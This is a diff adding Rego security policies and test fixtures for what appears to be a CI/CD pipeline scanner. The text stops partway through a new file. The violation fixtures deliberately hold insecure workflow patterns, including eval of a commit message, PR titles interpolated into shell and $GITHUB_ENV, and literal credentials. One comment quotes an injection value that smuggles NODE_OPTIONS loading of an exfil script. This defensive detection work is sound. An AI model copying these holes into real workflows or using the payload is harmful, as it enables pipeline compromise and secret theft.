+++ b/policies/template_injection_vars.rego
@@ -0,0 +1,43 @@
+# template-injection-vars β flag `run:` scripts that expand a
+# maintainer-adjacent template directly into the shell. Distinct
+# from ISSUE-206 (template-injection) which targets PR-author-
+# controlled `github.event.*` / `github.head_ref` β here the
+# sources are:
+#
+# - `vars.*` β repo / org / environment variables set by
+# maintainers. Exploitable on a maintainer
+# account compromise or a misconfigured
+# organisation-level variable.
+# - `inputs.*` β reusable-workflow inputs. When the reusable
+# workflow is called from a fork-influenceable
+# trigger (e.g. a caller workflow that proxies
+# `github.event.*` into inputs), the surface
+# flips to PR-author-controlled.
+#
+# Confidence is lower than ISSUE-206; severity stays at "low".
+# The fix is the same for both: bind the value through `env:`
+# first, then dereference the shell variable from the `run:` body
+# so expansion quotes the value instead of concatenating it as
+# code.
+package template_injection_vars
+
+import rego.v1
+
+unsafe_patterns := [
+ `\$\{\{\s*vars\.`,
+ `\$\{\{\s*inputs\.`,
+]
+
+deny contains finding if {
+ some i, j
+ job := input.pipeline.jobs[i]
+ script := job.scripts[j]
+ some k
+ regex.match(unsafe_patterns[k], script)
+ finding := {
+ "code": "ISSUE-215",
+ "severity": "low",
+ "message": sprintf("job %q expands a maintainer-adjacent template (`vars.*` or `inputs.*`) directly into a shell script β bind through `env:` and reference $VAR instead", [job.name]),
+ "job": job.name,
+ }
+}
diff --git a/policies/template_missing.rego b/policies/template_missing.rego
new file mode 100644
index 0000000..c915b77
--- /dev/null
+++ b/policies/template_missing.rego
@@ -0,0 +1,65 @@
+# template-missing β flag pipelines that do not include every CI/CD
+# template required by pipelineMustIncludeTemplate.requiredGroups.
+# Templates can be pulled via `include: { project: β¦ }`, via
+# `include: { template: β¦ }`, or via Plumber-augmented metadata; the
+# collector normalises each origin's path(s) for comparison. The
+# hardcoded origin is always skipped β it represents the project's own
+# .gitlab-ci.yml body, not an imported template.
+package template_missing
+
+import rego.v1
+
+deny contains finding if {
+ input.config.pipelineMustIncludeTemplate
+ groups := input.config.pipelineMustIncludeTemplate.requiredGroups
+ count(groups) > 0
+ not _any_group_satisfied(groups)
+ some i, j
+ group := groups[i]
+ required := group[j]
+ not _template_present(required)
+ finding := {
+ "code": "ISSUE-405",
+ "severity": "high",
+ "message": sprintf("required template %q is missing from the pipeline (group %d)", [required, i]),
+ "job": required,
+ }
+}
+
+# DNF: only emit findings when no group is fully satisfied.
+_any_group_satisfied(groups) if {
+ some i
+ group := groups[i]
+ count(group) > 0
+ every required in group {
+ _template_present(required)
+ }
+}
+
+_template_present(required) if {
+ some k
+ inc := input.pipeline.includes[k]
+ _is_template_kind(inc.kind)
+ _paths_match(inc, required)
+}
+
+_is_template_kind(kind) if {
+ kind != "component"
+ kind != "hardcoded"
+ kind != ""
+}
+
+_paths_match(inc, required) if {
+ inc.path != ""
+ inc.path == required
+}
+
+_paths_match(inc, required) if {
+ inc.altPath != ""
+ inc.altPath == required
+}
+
+_paths_match(inc, required) if {
+ inc.source != ""
+ inc.source == required
+}
diff --git a/policies/template_overridden.rego b/policies/template_overridden.rego
new file mode 100644
index 0000000..bd8f648
--- /dev/null
+++ b/policies/template_overridden.rego
@@ -0,0 +1,49 @@
+# template-overridden β flag pipelines that import a required CI/CD
+# template but redefine some of its jobs with forbidden CI/CD keys
+# (script, image, rules, β¦). The match set comes from
+# pipelineMustIncludeTemplate.requiredGroups and the per-origin
+# overridden-job list is populated by the collector (same regex as the
+# legacy Go control).
+package template_overridden
+
+import rego.v1
+
+deny contains finding if {
+ input.config.pipelineMustIncludeTemplate
+ groups := input.config.pipelineMustIncludeTemplate.requiredGroups
+ count(groups) > 0
+ some i, j, k
+ group := groups[i]
+ required := group[j]
+ inc := input.pipeline.includes[k]
+ _is_template_kind(inc.kind)
+ _paths_match(inc, required)
+ count(inc.overriddenJobs) > 0
+ finding := {
+ "code": "ISSUE-406",
+ "severity": "high",
+ "message": sprintf("required template %q is imported but %d of its job(s) are overridden locally", [required, count(inc.overriddenJobs)]),
+ "job": required,
+ }
+}
+
+_is_template_kind(kind) if {
+ kind != "component"
+ kind != "hardcoded"
+ kind != ""
+}
+
+_paths_match(inc, required) if {
+ inc.path != ""
+ inc.path == required
+}
+
+_paths_match(inc, required) if {
+ inc.altPath != ""
+ inc.altPath == required
+}
+
+_paths_match(inc, required) if {
+ inc.source != ""
+ inc.source == required
+}
diff --git a/policies/testdata/ISSUE-101/gitlab/clean_official.gitlab-ci.yml b/policies/testdata/ISSUE-101/gitlab/clean_official.gitlab-ci.yml
new file mode 100644
index 0000000..b2fe989
--- /dev/null
+++ b/policies/testdata/ISSUE-101/gitlab/clean_official.gitlab-ci.yml
@@ -0,0 +1,4 @@
+build:
+ image: python:3.12-slim
+ script:
+ - echo build
diff --git a/policies/testdata/ISSUE-101/gitlab/violation_untrusted.gitlab-ci.yml b/policies/testdata/ISSUE-101/gitlab/violation_untrusted.gitlab-ci.yml
new file mode 100644
index 0000000..47483b3
--- /dev/null
+++ b/policies/testdata/ISSUE-101/gitlab/violation_untrusted.gitlab-ci.yml
@@ -0,0 +1,4 @@
+build:
+ image: ghcr.io/attacker/unknown:1.0
+ script:
+ - echo build
diff --git a/policies/testdata/ISSUE-102/github/clean.workflow.yml b/policies/testdata/ISSUE-102/github/clean.workflow.yml
new file mode 100644
index 0000000..55efdb0
--- /dev/null
+++ b/policies/testdata/ISSUE-102/github/clean.workflow.yml
@@ -0,0 +1,18 @@
+# GitHub Actions workflow β all container tags pinned to specific versions.
+# Expected: 0 findings.
+name: CI
+on: push
+
+jobs:
+ build:
+ runs-on: ubuntu-latest
+ container: alpine:3.19
+ steps:
+ - run: echo build
+
+ deploy:
+ runs-on: ubuntu-latest
+ container:
+ image: node:20.10.0
+ steps:
+ - run: echo deploy
diff --git a/policies/testdata/ISSUE-102/github/violation_latest.workflow.yml b/policies/testdata/ISSUE-102/github/violation_latest.workflow.yml
new file mode 100644
index 0000000..5e91d37
--- /dev/null
+++ b/policies/testdata/ISSUE-102/github/violation_latest.workflow.yml
@@ -0,0 +1,17 @@
+# GitHub Actions workflow β forbidden tag "latest" on the deploy job.
+# Expected: 1 finding on deploy.
+name: CI
+on: push
+
+jobs:
+ build:
+ runs-on: ubuntu-latest
+ container: alpine:3.19
+ steps:
+ - run: echo build
+
+ deploy:
+ runs-on: ubuntu-latest
+ container: alpine:latest
+ steps:
+ - run: echo deploy
diff --git a/policies/testdata/ISSUE-102/github/violation_wildcards.workflow.yml b/policies/testdata/ISSUE-102/github/violation_wildcards.workflow.yml
new file mode 100644
index 0000000..30f3466
--- /dev/null
+++ b/policies/testdata/ISSUE-102/github/violation_wildcards.workflow.yml
@@ -0,0 +1,12 @@
+# GitHub Actions workflow β wildcard match against pattern "*-alpha".
+# Expected: 1 finding on ci. Uses the long-form container: { image: ... }.
+name: CI
+on: push
+
+jobs:
+ ci:
+ runs-on: ubuntu-latest
+ container:
+ image: node:20-alpha
+ steps:
+ - run: echo test
diff --git a/policies/testdata/ISSUE-102/gitlab/clean.gitlab-ci.yml b/policies/testdata/ISSUE-102/gitlab/clean.gitlab-ci.yml
new file mode 100644
index 0000000..6afe2e7
--- /dev/null
+++ b/policies/testdata/ISSUE-102/gitlab/clean.gitlab-ci.yml
@@ -0,0 +1,16 @@
+# All tags are pinned to specific versions. Expected: 0 findings.
+stages:
+ - build
+ - deploy
+
+build:
+ stage: build
+ image: alpine:3.19
+ script:
+ - echo build
+
+deploy:
+ stage: deploy
+ image: node:20.10.0
+ script:
+ - echo deploy
diff --git a/policies/testdata/ISSUE-102/gitlab/violation_latest.gitlab-ci.yml b/policies/testdata/ISSUE-102/gitlab/violation_latest.gitlab-ci.yml
new file mode 100644
index 0000000..7963d19
--- /dev/null
+++ b/policies/testdata/ISSUE-102/gitlab/violation_latest.gitlab-ci.yml
@@ -0,0 +1,16 @@
+# Forbidden tag 'latest' on one job. Expected: 1 finding on deploy.
+stages:
+ - build
+ - deploy
+
+build:
+ stage: build
+ image: alpine:3.19
+ script:
+ - echo build
+
+deploy:
+ stage: deploy
+ image: alpine:latest
+ script:
+ - echo deploy
diff --git a/policies/testdata/ISSUE-102/gitlab/violation_wildcards.gitlab-ci.yml b/policies/testdata/ISSUE-102/gitlab/violation_wildcards.gitlab-ci.yml
new file mode 100644
index 0000000..13475af
--- /dev/null
+++ b/policies/testdata/ISSUE-102/gitlab/violation_wildcards.gitlab-ci.yml
@@ -0,0 +1,9 @@
+# Wildcard match against pattern '*-alpha'. Expected: 1 finding on ci.
+stages:
+ - test
+
+ci:
+ stage: test
+ image: node:20-alpha
+ script:
+ - echo test
diff --git a/policies/testdata/ISSUE-103/github/clean_pinned.workflow.yml b/policies/testdata/ISSUE-103/github/clean_pinned.workflow.yml
new file mode 100644
index 0000000..397f130
--- /dev/null
+++ b/policies/testdata/ISSUE-103/github/clean_pinned.workflow.yml
@@ -0,0 +1,11 @@
+# Digest-pinned container image. Expected: 0 findings.
+name: CI
+on: push
+
+jobs:
+ build:
+ runs-on: ubuntu-latest
+ container:
+ image: alpine@sha256:c5b1261d6d3e43071626931fc004f70149baeba2c8ec672bd4f27761f8e1ad6b
+ steps:
+ - run: echo build
diff --git a/policies/testdata/ISSUE-103/github/violation_tagged.workflow.yml b/policies/testdata/ISSUE-103/github/violation_tagged.workflow.yml
new file mode 100644
index 0000000..cd063a5
--- /dev/null
+++ b/policies/testdata/ISSUE-103/github/violation_tagged.workflow.yml
@@ -0,0 +1,11 @@
+# Same rule on GitHub Actions: tagged containers fire when
+# mustBePinnedByDigest is enforced. Expected: 1 finding on build.
+name: CI
+on: push
+
+jobs:
+ build:
+ runs-on: ubuntu-latest
+ container: alpine:3.19
+ steps:
+ - run: echo build
diff --git a/policies/testdata/ISSUE-103/gitlab/clean_pinned.gitlab-ci.yml b/policies/testdata/ISSUE-103/gitlab/clean_pinned.gitlab-ci.yml
new file mode 100644
index 0000000..046dc97
--- /dev/null
+++ b/policies/testdata/ISSUE-103/gitlab/clean_pinned.gitlab-ci.yml
@@ -0,0 +1,9 @@
+# All images pinned by sha256 digest. Expected: 0 findings.
+stages:
+ - build
+
+build:
+ stage: build
+ image: alpine@sha256:c5b1261d6d3e43071626931fc004f70149baeba2c8ec672bd4f27761f8e1ad6b
+ script:
+ - echo build
diff --git a/policies/testdata/ISSUE-103/gitlab/violation_tagged.gitlab-ci.yml b/policies/testdata/ISSUE-103/gitlab/violation_tagged.gitlab-ci.yml
new file mode 100644
index 0000000..cae9f1d
--- /dev/null
+++ b/policies/testdata/ISSUE-103/gitlab/violation_tagged.gitlab-ci.yml
@@ -0,0 +1,17 @@
+# Tagged images without a digest, flagged when mustBePinnedByDigest is on.
+# Expected: 2 findings (both jobs).
+stages:
+ - build
+ - deploy
+
+build:
+ stage: build
+ image: alpine:3.19
+ script:
+ - echo build
+
+deploy:
+ stage: deploy
+ image: node:20.10.0
+ script:
+ - echo deploy
diff --git a/policies/testdata/ISSUE-104/github/clean_sha_pinned.yml b/policies/testdata/ISSUE-104/github/clean_sha_pinned.yml
new file mode 100644
index 0000000..cfcff9d
--- /dev/null
+++ b/policies/testdata/ISSUE-104/github/clean_sha_pinned.yml
@@ -0,0 +1,15 @@
+# All third-party actions pinned by 40-character commit SHA.
+# peaceiris/actions-gh-pages@4f9cc6602b3c52e6dd3ff78e1a74bbf0d0a45c9a
+# is a real commit SHA from v3.9.3 (March 2024). Expected: 0 findings.
+name: Release
+on: [push]
+
+jobs:
+ release:
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683
+ - uses: peaceiris/actions-gh-pages@4f9cc6602b3c52e6dd3ff78e1a74bbf0d0a45c9a
+ with:
+ github_token: ${{ secrets.GITHUB_TOKEN }}
+ publish_dir: ./public
diff --git a/policies/testdata/ISSUE-104/github/trusted_owner_tag.yml b/policies/testdata/ISSUE-104/github/trusted_owner_tag.yml
new file mode 100644
index 0000000..8a425d6
--- /dev/null
+++ b/policies/testdata/ISSUE-104/github/trusted_owner_tag.yml
@@ -0,0 +1,13 @@
+# When trustedOwners contains "actions" and "github", first-party
+# GitHub-owned actions can keep tag-based refs. The third-party
+# action (peaceiris) is still flagged. Expected: 1 finding (peaceiris).
+name: Release
+on: [push]
+
+jobs:
+ release:
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/checkout@v4
+ - uses: github/codeql-action/init@v3
+ - uses: peaceiris/actions-gh-pages@v3
diff --git a/policies/testdata/ISSUE-104/github/violation_tag_ref.yml b/policies/testdata/ISSUE-104/github/violation_tag_ref.yml
new file mode 100644
index 0000000..cad8121
--- /dev/null
+++ b/policies/testdata/ISSUE-104/github/violation_tag_ref.yml
@@ -0,0 +1,18 @@
+# actions/checkout@v4 is a mutable tag. The maintainer can retag v4 to
+# point at any commit — or an attacker who compromises the maintainer's
+# account can do the same. Pin by 40-char commit SHA instead. Expected:
+# 3 findings (checkout, setup-node and peaceiris — all three use
+# mutable tag refs, and this fixture sets no trustedOwners exemption).
+name: Release
+on: [push]
+
+jobs:
+ release:
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/checkout@v4
+ - uses: actions/setup-node@v3
+ - uses: peaceiris/actions-gh-pages@v3
+ with:
+ github_token: ${{ secrets.GITHUB_TOKEN }}
+ publish_dir: ./public
diff --git a/policies/testdata/ISSUE-105/github/clean_no_credentials.yml b/policies/testdata/ISSUE-105/github/clean_no_credentials.yml
new file mode 100644
index 0000000..647a478
--- /dev/null
+++ b/policies/testdata/ISSUE-105/github/clean_no_credentials.yml
@@ -0,0 +1,11 @@
+# Public image β no credentials block at all. Expected: 0 findings.
+name: Build
+on: [push]
+
+jobs:
+ build:
+ runs-on: ubuntu-latest
+ container:
+ image: node:20
+ steps:
+ - run: echo build
diff --git a/policies/testdata/ISSUE-105/github/clean_secret_ref.yml b/policies/testdata/ISSUE-105/github/clean_secret_ref.yml
new file mode 100644
index 0000000..3d8a2f5
--- /dev/null
+++ b/policies/testdata/ISSUE-105/github/clean_secret_ref.yml
@@ -0,0 +1,15 @@
+# Password sourced from a repo/org secret β the value never lands in
+# the workflow YAML. Expected: 0 findings.
+name: Build
+on: [push]
+
+jobs:
+ build:
+ runs-on: ubuntu-latest
+ container:
+ image: ghcr.io/example/private:latest
+ credentials:
+ username: ${{ secrets.DOCKER_USERNAME }}
+ password: ${{ secrets.DOCKER_PASSWORD }}
+ steps:
+ - run: echo build
diff --git a/policies/testdata/ISSUE-105/github/violation_literal.yml b/policies/testdata/ISSUE-105/github/violation_literal.yml
new file mode 100644
index 0000000..95f6a87
--- /dev/null
+++ b/policies/testdata/ISSUE-105/github/violation_literal.yml
@@ -0,0 +1,16 @@
+# password is a string literal committed to git history. Anyone with
+# clone access can retrieve it; rotation requires history rewriting.
+# Expected: 1 finding on build.
+name: Build
+on: [push]
+
+jobs:
+ build:
+ runs-on: ubuntu-latest
+ container:
+ image: ghcr.io/example/private:latest
+ credentials:
+ username: myuser
+ password: hunter2
+ steps:
+ - run: echo build
diff --git a/policies/testdata/ISSUE-106/github/clean_ci_no_publish.yml b/policies/testdata/ISSUE-106/github/clean_ci_no_publish.yml
new file mode 100644
index 0000000..334965b
--- /dev/null
+++ b/policies/testdata/ISSUE-106/github/clean_ci_no_publish.yml
@@ -0,0 +1,15 @@
+# Plain CI workflow without any publish action: caching here is
+# intended and not release-relevant. Expected: 0 findings.
+name: CI
+on: [push]
+
+jobs:
+ test:
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/checkout@v4
+ - uses: actions/setup-node@v4
+ with:
+ node-version: '20'
+ cache: 'npm'
+ - run: npm test
diff --git a/policies/testdata/ISSUE-106/github/clean_release_scoped_key.yml b/policies/testdata/ISSUE-106/github/clean_release_scoped_key.yml
new file mode 100644
index 0000000..77f8929
--- /dev/null
+++ b/policies/testdata/ISSUE-106/github/clean_release_scoped_key.yml
@@ -0,0 +1,15 @@
+# Release workflow, but the cache key includes github.ref_name — a PR
+# run cannot populate the same key. Expected: 0 findings.
+name: Release
+on: [release]
+
+jobs:
+ publish:
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/checkout@v4
+ - uses: actions/cache@v4
+ with:
+ key: release-${{ github.ref_name }}-${{ hashFiles('**/package-lock.json') }}
+ path: ~/.npm
+ - uses: JS-DevTools/npm-publish@v3
diff --git a/policies/testdata/ISSUE-106/github/violation_publish_action.yml b/policies/testdata/ISSUE-106/github/violation_publish_action.yml
new file mode 100644
index 0000000..7bdfd8d
--- /dev/null
+++ b/policies/testdata/ISSUE-106/github/violation_publish_action.yml
@@ -0,0 +1,16 @@
+# Push-triggered workflow invokes the pypa publish action β release
+# intent in a non-release trigger. Cache is un-scoped. Expected: 1.
+name: Build and Publish
+on: [push]
+
+jobs:
+ build:
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/checkout@v4
+ - uses: actions/setup-python@v5
+ with:
+ python-version: '3.12'
+ cache: pip
+ - run: python -m build
+ - uses: pypa/gh-action-pypi-publish@v1
diff --git a/policies/testdata/ISSUE-106/github/violation_release_unkeyed.yml b/policies/testdata/ISSUE-106/github/violation_release_unkeyed.yml
new file mode 100644
index 0000000..076080d
--- /dev/null
+++ b/policies/testdata/ISSUE-106/github/violation_release_unkeyed.yml
@@ -0,0 +1,16 @@
+# Release workflow restores actions/cache with a key that does not
+# reference the release ref β a PR-populated entry on the same key
+# slides into the published build. Expected: 1 finding.
+name: Release
+on: [release]
+
+jobs:
+ publish:
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/checkout@v4
+ - uses: actions/cache@v4
+ with:
+ key: deps-${{ hashFiles('**/package-lock.json') }}
+ path: ~/.npm
+ - uses: JS-DevTools/npm-publish@v3
diff --git a/policies/testdata/ISSUE-112/github/clean_cosign.yml b/policies/testdata/ISSUE-112/github/clean_cosign.yml
new file mode 100644
index 0000000..763a4c3
--- /dev/null
+++ b/policies/testdata/ISSUE-112/github/clean_cosign.yml
@@ -0,0 +1,20 @@
+# Same release but with cosign signing the artefacts. Expected: 0.
+name: Release
+on: [release]
+
+jobs:
+ publish:
+ runs-on: ubuntu-latest
+ permissions:
+ id-token: write
+ contents: write
+ steps:
+ - uses: actions/checkout@v4
+ - uses: sigstore/cosign-installer@v3
+ - run: make dist
+ - run: cosign sign-blob --yes dist/release.tar.gz > dist/release.tar.gz.sig
+ - uses: softprops/action-gh-release@v2
+ with:
+ files: |
+ dist/release.tar.gz
+ dist/release.tar.gz.sig
diff --git a/policies/testdata/ISSUE-112/github/violation_release_unsigned.yml b/policies/testdata/ISSUE-112/github/violation_release_unsigned.yml
new file mode 100644
index 0000000..36ff0bd
--- /dev/null
+++ b/policies/testdata/ISSUE-112/github/violation_release_unsigned.yml
@@ -0,0 +1,14 @@
+# Release workflow uses softprops/action-gh-release but no signing
+# step. Expected: 1 finding on publish.
+name: Release
+on: [release]
+
+jobs:
+ publish:
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/checkout@v4
+ - run: make dist
+ - uses: softprops/action-gh-release@v2
+ with:
+ files: dist/*
diff --git a/policies/testdata/ISSUE-115/github/clean.yml b/policies/testdata/ISSUE-115/github/clean.yml
new file mode 100644
index 0000000..20ec3d4
--- /dev/null
+++ b/policies/testdata/ISSUE-115/github/clean.yml
@@ -0,0 +1,18 @@
+# No superfluous action β gh pr create called directly. Expected: 0.
+name: Auto-PR
+on: [schedule]
+
+jobs:
+ open-pr:
+ runs-on: ubuntu-latest
+ permissions:
+ contents: write
+ pull-requests: write
+ steps:
+ - uses: actions/checkout@v4
+ - run: |
+ echo "change" > NEW.md
+ git checkout -b automated
+ git commit -am "bump"
+ git push -u origin automated
+ gh pr create --title automated --body ""
diff --git a/policies/testdata/ISSUE-115/github/violation_peter_evans_pr.yml b/policies/testdata/ISSUE-115/github/violation_peter_evans_pr.yml
new file mode 100644
index 0000000..d5e123e
--- /dev/null
+++ b/policies/testdata/ISSUE-115/github/violation_peter_evans_pr.yml
@@ -0,0 +1,15 @@
+# peter-evans/create-pull-request adds a third-party dependency to
+# do what `gh pr create` already does from the runner. Expected: 1.
+name: Auto-PR
+on: [schedule]
+
+jobs:
+ open-pr:
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/checkout@v4
+ - run: echo "change" > NEW.md
+ - uses: peter-evans/create-pull-request@v6
+ with:
+ title: automated
+ commit-message: bump
diff --git a/policies/testdata/ISSUE-203/gitlab/clean.gitlab-ci.yml b/policies/testdata/ISSUE-203/gitlab/clean.gitlab-ci.yml
new file mode 100644
index 0000000..3de002d
--- /dev/null
+++ b/policies/testdata/ISSUE-203/gitlab/clean.gitlab-ci.yml
@@ -0,0 +1,6 @@
+deploy:
+ image: alpine:3.19
+ variables:
+ DEPLOY_ENV: "prod"
+ script:
+ - echo deploy
diff --git a/policies/testdata/ISSUE-203/gitlab/violation_debug_enabled.gitlab-ci.yml b/policies/testdata/ISSUE-203/gitlab/violation_debug_enabled.gitlab-ci.yml
new file mode 100644
index 0000000..f9298ed
--- /dev/null
+++ b/policies/testdata/ISSUE-203/gitlab/violation_debug_enabled.gitlab-ci.yml
@@ -0,0 +1,6 @@
+deploy:
+ image: alpine:3.19
+ variables:
+ CI_DEBUG_TRACE: "true"
+ script:
+ - echo deploy
diff --git a/policies/testdata/ISSUE-204/gitlab/clean_echo.gitlab-ci.yml b/policies/testdata/ISSUE-204/gitlab/clean_echo.gitlab-ci.yml
new file mode 100644
index 0000000..482060c
--- /dev/null
+++ b/policies/testdata/ISSUE-204/gitlab/clean_echo.gitlab-ci.yml
@@ -0,0 +1,4 @@
+deploy:
+ image: alpine:3.19
+ script:
+ - echo "${CI_COMMIT_MESSAGE}"
diff --git a/policies/testdata/ISSUE-204/gitlab/violation_eval.gitlab-ci.yml b/policies/testdata/ISSUE-204/gitlab/violation_eval.gitlab-ci.yml
new file mode 100644
index 0000000..45deeaf
--- /dev/null
+++ b/policies/testdata/ISSUE-204/gitlab/violation_eval.gitlab-ci.yml
@@ -0,0 +1,4 @@
+deploy:
+ image: alpine:3.19
+ script:
+ - eval "${CI_COMMIT_MESSAGE}"
diff --git a/policies/testdata/ISSUE-205/gitlab/clean.gitlab-ci.yml b/policies/testdata/ISSUE-205/gitlab/clean.gitlab-ci.yml
new file mode 100644
index 0000000..3de002d
--- /dev/null
+++ b/policies/testdata/ISSUE-205/gitlab/clean.gitlab-ci.yml
@@ -0,0 +1,6 @@
+deploy:
+ image: alpine:3.19
+ variables:
+ DEPLOY_ENV: "prod"
+ script:
+ - echo deploy
diff --git a/policies/testdata/ISSUE-205/gitlab/violation_override.gitlab-ci.yml b/policies/testdata/ISSUE-205/gitlab/violation_override.gitlab-ci.yml
new file mode 100644
index 0000000..fc56244
--- /dev/null
+++ b/policies/testdata/ISSUE-205/gitlab/violation_override.gitlab-ci.yml
@@ -0,0 +1,6 @@
+deploy:
+ image: alpine:3.19
+ variables:
+ PROD_TOKEN: "hardcoded-token"
+ script:
+ - echo deploy
diff --git a/policies/testdata/ISSUE-206/github/clean_env_var.yml b/policies/testdata/ISSUE-206/github/clean_env_var.yml
new file mode 100644
index 0000000..2313690
--- /dev/null
+++ b/policies/testdata/ISSUE-206/github/clean_env_var.yml
@@ -0,0 +1,15 @@
+# Safe pattern: the template expression lands in env:, the shell
+# script reads it via "$TITLE". Shell variable expansion quotes the
+# value so injection payloads become literal arguments. Expected: 0
+# findings.
+name: Safe greeting
+on: pull_request
+
+jobs:
+ safe:
+ runs-on: ubuntu-latest
+ steps:
+ - name: Greet safely
+ env:
+ TITLE: ${{ github.event.pull_request.title }}
+ run: echo "Welcome $TITLE"
diff --git a/policies/testdata/ISSUE-206/github/violation_head_ref.yml b/policies/testdata/ISSUE-206/github/violation_head_ref.yml
new file mode 100644
index 0000000..00462c2
--- /dev/null
+++ b/policies/testdata/ISSUE-206/github/violation_head_ref.yml
@@ -0,0 +1,13 @@
+# github.head_ref is the source branch name of a PR, attacker-
+# controlled for fork PRs. Interpolated directly, it is an injection
+# sink. Expected: 1 finding on bad.
+name: Injection via head_ref
+on: pull_request
+
+jobs:
+ bad:
+ runs-on: ubuntu-latest
+ steps:
+ - run: |
+ echo "Building branch ${{ github.head_ref }}"
+ make release
diff --git a/policies/testdata/ISSUE-206/github/violation_pr_title.yml b/policies/testdata/ISSUE-206/github/violation_pr_title.yml
new file mode 100644
index 0000000..ce8b80b
--- /dev/null
+++ b/policies/testdata/ISSUE-206/github/violation_pr_title.yml
@@ -0,0 +1,11 @@
+# PR title is user-controlled and pasted verbatim into a shell
+# command. Combined with pull_request_target the workflow token leaks
+# to the attacker. Expected: 1 finding on bad.
+name: Injection via PR title
+on: pull_request_target
+
+jobs:
+ bad:
+ runs-on: ubuntu-latest
+ steps:
+ - run: echo "Welcome, reviewing ${{ github.event.pull_request.title }}"
diff --git a/policies/testdata/ISSUE-208/github/clean.yml b/policies/testdata/ISSUE-208/github/clean.yml
new file mode 100644
index 0000000..73dc1d9
--- /dev/null
+++ b/policies/testdata/ISSUE-208/github/clean.yml
@@ -0,0 +1,11 @@
+# Normal env vars, no deprecated-command override. Expected: 0 findings.
+name: Safe
+on: push
+
+jobs:
+ good:
+ runs-on: ubuntu-latest
+ env:
+ FOO: bar
+ steps:
+ - run: echo "ok"
diff --git a/policies/testdata/ISSUE-208/github/violation_enabled.yml b/policies/testdata/ISSUE-208/github/violation_enabled.yml
new file mode 100644
index 0000000..a2ec6d3
--- /dev/null
+++ b/policies/testdata/ISSUE-208/github/violation_enabled.yml
@@ -0,0 +1,12 @@
+# Job re-enables the deprecated `::set-env::` / `::add-path::` commands.
+# Expected: 1 finding on bad.
+name: Insecure
+on: push
+
+jobs:
+ bad:
+ runs-on: ubuntu-latest
+ env:
+ ACTIONS_ALLOW_UNSECURE_COMMANDS: 'true'
+ steps:
+ - run: echo "bad"
diff --git a/policies/testdata/ISSUE-209/github/clean_env_binding.yml b/policies/testdata/ISSUE-209/github/clean_env_binding.yml
new file mode 100644
index 0000000..8513f35
--- /dev/null
+++ b/policies/testdata/ISSUE-209/github/clean_env_binding.yml
@@ -0,0 +1,15 @@
+# Safe pattern: the PR title is bound through env: first, then the
+# sticky file is populated from the env var. Shell expansion quotes
+# the value, so injection payloads don't break out. Expected: 0.
+name: Preview
+on: [pull_request_target]
+
+jobs:
+ build:
+ runs-on: ubuntu-latest
+ steps:
+ - env:
+ TITLE: ${{ github.event.pull_request.title }}
+ run: |
+ # The redirect sees "$TITLE", not the template literal.
+ echo "PR_TITLE=$TITLE" >> $GITHUB_ENV
diff --git a/policies/testdata/ISSUE-209/github/clean_literal.yml b/policies/testdata/ISSUE-209/github/clean_literal.yml
new file mode 100644
index 0000000..691ead4
--- /dev/null
+++ b/policies/testdata/ISSUE-209/github/clean_literal.yml
@@ -0,0 +1,11 @@
+# Writing a literal string into $GITHUB_ENV is fine β no user input
+# involved. Expected: 0 findings.
+name: Build
+on: [push]
+
+jobs:
+ build:
+ runs-on: ubuntu-latest
+ steps:
+ - run: echo "BUILD_MODE=release" >> $GITHUB_ENV
+ - run: echo "/usr/local/custom/bin" >> $GITHUB_PATH
diff --git a/policies/testdata/ISSUE-209/github/violation_event_to_env.yml b/policies/testdata/ISSUE-209/github/violation_event_to_env.yml
new file mode 100644
index 0000000..381a38d
--- /dev/null
+++ b/policies/testdata/ISSUE-209/github/violation_event_to_env.yml
@@ -0,0 +1,11 @@
+# PR title written verbatim into $GITHUB_ENV. A PR titled
+# `"; NODE_OPTIONS=--require=./exfil.js #`
+# poisons subsequent Node invocations. Expected: 1 finding on build.
+name: Preview
+on: [pull_request_target]
+
+jobs:
+ build:
+ runs-on: ubuntu-latest
+ steps:
+ - run: echo "PR_TITLE=${{ github.event.pull_request.title }}" >> $GITHUB_ENV
diff --git a/policies/testdata/ISSUE-209/github/violation_head_ref_to_path.yml b/policies/testdata/ISSUE-209/github/violation_head_ref_to_path.yml
new file mode 100644
index 0000000..76d8d1a
--- /dev/null
+++ b/policies/testdata/ISSUE-209/github/violation_head_ref_to_path.yml
@@ -0,0 +1,11 @@
+# A fork branch name interpolated into $GITHUB_PATH. Any PATH-resolved
+# command after this step ("npm", "bash", ...) can be hijacked.
+# Expected: 1 finding on deploy.
+name: Deploy
+on: [pull_request_target]
+
+jobs:
+ deploy:
+ runs-on: ubuntu-latest
+ steps:
+ - run: echo "/tmp/${{ github.head_ref }}/bin" >> $GITHUB_PATH
diff --git a/policies/testdata/ISSUE-210/github/clean_branch_condition.yml b/policies/testdata/ISSUE-210/github/clean_branch_condition.yml
new file mode 100644
index 0000000..71bc652
--- /dev/null
+++ b/policies/testdata/ISSUE-210/github/clean_branch_condition.yml
@@ -0,0 +1,11 @@
+# If: gates on branch name (github.ref). Branches are tied to push
+# protections, not spoofable. Expected: 0 findings.
+name: Deploy
+on: [push]
+
+jobs:
+ deploy:
+ runs-on: ubuntu-latest
+ if: github.ref == 'refs/heads/main'
+ steps:
+ - run: ./deploy.sh
diff --git a/policies/testdata/ISSUE-210/github/violation_actor_dependabot.yml b/policies/testdata/ISSUE-210/github/violation_actor_dependabot.yml
new file mode 100644
index 0000000..5c726c0
--- /dev/null
+++ b/policies/testdata/ISSUE-210/github/violation_actor_dependabot.yml
@@ -0,0 +1,12 @@
+# Workflow gates the auto-merge on github.actor == dependabot[bot].
+# A forked account registered under that login satisfies the check
+# and gets the elevated path. Expected: 1 finding.
+name: Auto-merge Dependabot
+on: [pull_request_target]
+
+jobs:
+ merge:
+ runs-on: ubuntu-latest
+ if: github.actor == 'dependabot[bot]'
+ steps:
+ - run: gh pr merge --auto --squash "$PR_URL"
diff --git a/policies/testdata/ISSUE-210/github/violation_sender_login.yml b/policies/testdata/ISSUE-210/github/violation_sender_login.yml
new file mode 100644
